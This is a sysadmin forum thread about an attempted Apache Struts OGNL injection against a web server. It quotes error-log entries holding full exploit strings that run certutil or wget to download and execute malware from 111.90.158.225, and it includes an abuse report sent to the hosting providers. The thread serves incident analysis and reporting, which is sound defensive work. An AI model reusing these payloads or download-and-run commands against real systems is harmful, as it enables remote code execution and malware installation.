Web Hack Attempt from whois 209.126.68.6


 
Thread Tools Search this Thread
Special Forums Cybersecurity Web Hack Attempt from whois 209.126.68.6
# 1  
Old 11-19-2018
Web Hack Attempt from whois 209.126.68.6

Anyone care to take a stab at decoding this hack attempt on a web server. From the error logs:

Code:
$ cat error.log

Code:
[Mon Nov 19 18:56:44.614122 2018] [core:error] [pid 1211] (36)File name too long: [client 209.126.68.6:45105] AH00036: access to /${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#w=#ct.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('certutil.exe -urlcache -split -f http://111.90.158.225/d/fast.exe c:/fast.exe&cmd.exe /c c:\\\\fast.exe').getInputStream()))).(#w.close())}/index.action failed (filesystem path '/var/www/${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#w=#ct.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('certutil.exe -urlcache -split -f http:')
[Mon Nov 19 18:56:44.641285 2018] [core:error] [pid 1268] (36)File name too long: [client 209.126.68.6:45119] AH00036: access to /${(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('certutil.exe -urlcache -split -f http://111.90.158.225/d/fast.exe c:/fast.exe&cmd.exe /c c:\\\\fast.exe').getInputStream()))).(#w.close())}/index.action failed (filesystem path '/var/www/${(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('certutil.exe -urlcache -split -f http:')
[Mon Nov 19 18:56:44.669095 2018] [core:error] [pid 3624] (36)File name too long: [client 209.126.68.6:45134] AH00036: access to /${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#w=#ct.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('nohup uname --m|grep x86_64 >> /dev/null || (pkill loop ; wget -O .loop http://111.90.158.225/d/ft32 && chmod 777 .loop && ./.loop)&&(pkill loop ; wget -O .loop http://111.90.158.225/d/ft64 && chmod 777 .loop && ./.loop) &').getInputStream()))).(#w.close())}/index.action failed (filesystem path '/var/www/${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#w=#ct.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('nohup uname --m|grep x86_64 >> ')

Examine carefully in code above including this executable file in the code:

Code:
 wget -O .loop http://111.90.158.225/d/ft32

and

Code:
wget -O .loop http://111.90.158.225/d/ft64

# 2  
Old 11-20-2018
Note:

Code:
to:	        abuse@shinjiru.com.my, ipadmin@primary.net
date:	        Nov 20, 2018, 11:06 AM
subject:	Hacker / Attacker at IP addresses 209.126.68.6 and 111.90.158.225

Quote:
Hi.

We have firm evidence of someone at 209.126.68.6 attempting to execute malicious javascript code which downloads malware from 111.90.158.225.

Here is the log file entries (which we have blocked):
# 3  
Old 11-20-2018
See also:

Code:
$:/var/log# grep 209.126.68.6 *log
auth.log:Nov 19 18:56:44 www sshd[5799]: Did not receive identification string from 209.126.68.6 port 41023

# 4  
Old 11-20-2018
# 5  
Old 11-20-2018
See all this PDF:

https://infosec.cert-pa.it/analyze/7...5e1d793b4b.pdf

Google 111.90.158.225 to learn more if you are interested in malware.
Login or Register to Ask a Question

Previous Thread | Next Thread

4 More Discussions You Might Find Interesting

1. Shell Programming and Scripting

SFTP return Error Code 126

Hi, We are getting the following error code while connection remote server using sftp command. sftp user@serrver Warning: child process (/opt/ssh2/bin/ssh2) exited with code 126. pls Advise. (2 Replies)
Discussion started by: koti_rama
2 Replies

2. Shell Programming and Scripting

whois country help

Hello folks, I have list of ips like 1.1.1.1 2.2.2.2 3.3.3.3 4.4.4.4 whois 1.1.1.1 |grep -E 'country|Country' it show country=US or whatever. so i have number of ips in text file, how i can use above script to automate output like 1.1.1.1 US 2.2.2.2 CA 3.3.3.3 FR (3 Replies)
Discussion started by: learnbash
3 Replies

3. UNIX for Advanced & Expert Users

Exit Status 126 - how to get rid of it

Hi All, I have a small application hosted on apache-tomcat 5. Basically its a html page which in turn calls a perl script residing on unix server. Through this perl script i am calling a shell script using system command , like system('scriptname.sh',arg1,arg2,arg3); Now in the script... (5 Replies)
Discussion started by: glamo_2312
5 Replies

4. AIX

ar: 0707-126

Trying to build code on IBM_AIX 5.3. Following error occured during build. ar: 0707-126 $projdir/obj/ibm/5.3/NewApp/NewApp.o is not valid with the current object file mode. Use the -X option to specify the desired object mode. ANy help is appreciated to resolve the error. (2 Replies)
Discussion started by: milindb
2 Replies
Login or Register to Ask a Question